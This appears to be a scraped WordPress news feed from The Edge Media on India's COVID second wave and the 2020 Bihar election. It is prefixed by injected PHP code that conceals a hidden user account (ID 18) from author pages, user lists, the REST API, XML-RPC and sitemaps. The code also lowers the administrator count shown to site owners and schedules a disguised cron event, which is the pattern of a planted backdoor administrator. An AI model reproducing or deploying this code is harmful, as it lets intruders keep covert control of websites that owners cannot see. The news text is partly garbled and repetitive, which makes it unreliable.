add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 18;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 18 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 18;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 18;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
The post Mild decline in daily cases of corona appeared first on The Edge Media.
]]>In the last several days, more than three lakh cases of coronavirus are coming in the country and more than two thousand people are dying. However, on Tuesday, a slight decline has been observed in the daily cases of corona.
More than 3.23 lakh cases were registered in the last 24 hours. Here Karuna Shukla, niece of former Prime Minister Atal Bihari Vajpayee, has died from Corona. Railways have so far supplied 450 tonnes of oxygen.
A case of black marketing of Remedicivir drug has come to light in Goregaon, Mumbai. From the kitchen of Goregaon hotel, Mumbai Crime Branch has arrested five people who were black marketing Remedesivir.
26 vials have been seized from them. These people were selling a violin for Rs 20,000-25,000.
Indian Railways informed that till today morning 450 tonnes of oxygen has been supplied to the country. At the same time, six loaded tankers are on the way, which will be taken from Bokaro to Jabalpur and Mandideep.
The US biopharmaceutical company has announced a move to increase the availability of Remadecivir drug used in the treatment of covid-19 patients in India.
Gilead Sciences Chief Commercial Officer Johanna Mercier said the recent increase in cases of covid-19 in India has had a disastrous effect on people and has led to unforeseen pressure on the health system.
The company announced that it will provide technical support to its voluntary licensing partners and support the addition of new local manufacturing companies and the delivery of active pharmaceutical ingredients (APIs) to rapidly increase production of Remedesivir.
The company said that Gilead will donate 450,000 vials of Vekleri (Remedesivir) for the immediate help of Indian patients.
The post Mild decline in daily cases of corona appeared first on The Edge Media.
]]>The post Negligence, election and wedding-party feast on second wave, how will situation improve? appeared first on The Edge Media.
]]>Looking at the current situation, it can also be said that as a country we may not have learned much from the experience of the last one year. Had it been learned, such an odd situation would not have arisen today.
People stopped following rescue measures after the first wave weakened in the country. This is also the biggest reason for the second wave. The government started opening everything up.
This made things the same as before Corona. People stopped taking precautions. Due to this, a large part of the population began to fall prey to this disease.
States also delayed curbing people due to which the health system continued to collapse due to increasing cases of infection. In such a situation, once again the government had to implement lockdown in many places, which is causing even more damage to the economy.
Negligence towards rescue measures started at the central government level. Then all political groups and common people started careless. Schools and colleges began to open up without the entire staff being vaccinated.
Restrictions should have been strictly enforced wherever there were cases of infection, but no political party wanted to do so because of the election.
The plan to hold elections during the corona epidemic should also have been planned carefully. However, this did not happen. Here, Kumbh was organized in Uttarakhand, due to which the corona exploded.
The time has come for us to learn a lesson from this period. Unite as an individual and as a society, come forward to protect humanity.
Just like the last time every person from the voluntary organizations of the country to the street mohallas and villages had become a warrior, this time too, the same spirit will have to be brought to defeat Corona. Only then will we be able to win the battle against Corona.
Scientists believe that the new variants of Corona, negligence against epidemic prevention measures, elections, religious events and ceremonies are the main causes of the second wave.
With the arrival of 3 lakh 49 thousand 691 new cases of corona virus infection in India in a day, the total cases of covid-19 increased to 1 crore 69 lakh 60 thousand 172.
Experts say that the second wave is more powerful than the first. Experts say many things are responsible for the second wave of Corona. These include things like not following the covid-19 protocol, low interest in getting vaccinated and sluggish pace of vaccination.
The post Negligence, election and wedding-party feast on second wave, how will situation improve? appeared first on The Edge Media.
]]>The post Oxygen deficiency in Jaipur Golden Hospital appeared first on The Edge Media.
]]>DK Baluja, a doctor at Jaipur Golden Hospital, said that 20 patients died due to lack of oxygen last night. We have only 1.5 hours of oxygen left. The lives of 200 people are in danger.
At the same time, it is a matter of relief that the Delhi government made emergency supplies of oxygen to Batra Hospital located in Tughlakabad Institutional Area of Delhi, within minutes of the oxygen exhaustion. The officials gave this information on Saturday.
Sudhanshu Venkat, executive director of the hospital, said that oxygen was out of the hospital at around 9 am. He said, ‘Just now, emergency supplies of oxygen were made to us by the Delhi government.
It will run for about one and a half hours. Our supplier is not answering the phone. ”He further said that about 350 patients are admitted in the hospital, out of which 265 are suffering from corona virus and 30 are in ICU.
The oxygen tanker arrived at Batra Hospital and Medical Research Center in Delhi on Saturday. Dr. SCL Gupta, MD of Batra Hospital told that we have 1.5 hours more oxygen. There are 200 patients admitted in our hospital.
Doctor SCL Gupta further said that oxygen is very important for the treatment of covid patients. We have got 500 liters of oxygen. We need 8,000 liters of oxygen throughout the day. What will we do if oxygen is not found?
Meanwhile, Saroj Hospital in Delhi said, ‘Due to lack of oxygen, we are going to stop recruiting patients. We are discharging patients.
The post Oxygen deficiency in Jaipur Golden Hospital appeared first on The Edge Media.
]]>The post Women are making masks by donating old cotton clothes appeared first on The Edge Media.
]]>
In such a situation, the women of Faizullaganj have started the program ‘Bring cotton clothes, take away free masks’. Under this, women are taking cotton clothes from people.
In return, they are being given masks for free. So that people can be protected from corona virus infection.
Social activist Mamta Tripathi, Meena Pandey said that at present, the house is also sitting vacant in lockdown.
Second, in times of this disaster, people should be helped from their level. So this plan was made in collaboration with the regional women.
First, people are asked to donate cotton clothes. Then women who have sewing machines. She is preparing the mask. Their masks are prepared and given to the villagers.
According to women, villagers who give cotton cloth. Antioxidants are done by washing it in detol and alum solution. Then masks are made from it. So far, around 500 people have been given this mask. These masks can be washed and used again.
The post Women are making masks by donating old cotton clothes appeared first on The Edge Media.
]]>The post Congress leaders Digvijay Singh and Randeep Surjewala infected appeared first on The Edge Media.
]]>The post Congress leaders Digvijay Singh and Randeep Surjewala infected appeared first on The Edge Media.
]]>The post Quite serious: SC on issues raised by Param Bir Singh in plea against Deshmukh appeared first on The Edge Media.
]]>The post Quite serious: SC on issues raised by Param Bir Singh in plea against Deshmukh appeared first on The Edge Media.
]]>The post Congress contested against PDP in DDC elections appeared first on The Edge Media.
]]>The post Congress contested against PDP in DDC elections appeared first on The Edge Media.
]]>The post Departments divided in Bihar, rural development to Mewa Lal, health to Mangal Pandey again! appeared first on The Edge Media.
]]>The post Departments divided in Bihar, rural development to Mewa Lal, health to Mangal Pandey again! appeared first on The Edge Media.
]]>The post Nitish kumar will be the bigg boss of bihar appeared first on The Edge Media.
]]>This is three more than the magic figure of 122 needed for the majority. The RJD-led opposition grand alliance has won 110 seats. Among the constituents of the NDA, Nitish Kumar’s Janata Dal United (JDU) has won 43 seats. At the same time, JDU’s alliance partner BJP’s candidate has been winning in 74 seats. Hindustani Awam Morcha (Hum), the other constituent of the NDA, has got four seats and Vikashani Insan Party (VIP) has won four seats.
The NDA has obtained a majority by defying the exit poll estimates. After NDA majority, it is decided that Nitish Kumar will be the next Chief Minister of Bihar. Nitish Kumar got power, but he is weak. His party’s seats have decreased.
This is the first time that the JDU has lagged behind the BJP in the alliance and has become the number two party. However, BJP national president JP Nadda has also made it clear during the campaign that Nitish Kumar will become the chief minister even if the seats are reduced.
The post Nitish kumar will be the bigg boss of bihar appeared first on The Edge Media.
]]>The post NDA again with majority in election contest appeared first on The Edge Media.
]]>According to Election Commission data, till 6 pm, the difference of 200 votes in 3 seats, difference of 500 votes in 9 seats, difference of 1000 votes in 17 seats, difference of 2000 votes in 33 seats, difference of 3000 votes in 48 seats and There is a difference of 5000 votes in 68 seats.
The Bharatiya Janata Party is emerging as the largest party in terms of seats in Bihar and is leading in more than 73 seats. While RJD has emerged as the second party, RJD is still leading in 70 seats. In the Grand Alliance, the Congress is ahead in 20 seats, while the JDU is leading in 50 seats in the NDA.
Results will come till late night: Election Commission
According to the Election Commission, this time the results of the Bihar assembly elections will come till late night. In the Corona crisis, votes are being counted with many precautions, as well as the number of counting booths has also increased by nearly 50 percent. There are many seats where votes are to be counted from 19 to 51 rounds this time. Around 1.34 crore votes were counted till 2.30 pm, while more than three crore votes are still to be counted.
Celebration somewhere, waiting somewhere
The trend in Bihar is constantly reversing, initially the Mahagathbandhan was leading, then the NDA is now ahead. In such a situation, the celebration of supporters is also being affected. NDA supporters started playing the drums in the afternoon, but when the Election Commission said that the final results will come by night. So caution is being taken by both the coalitions now.
The post NDA again with majority in election contest appeared first on The Edge Media.
]]>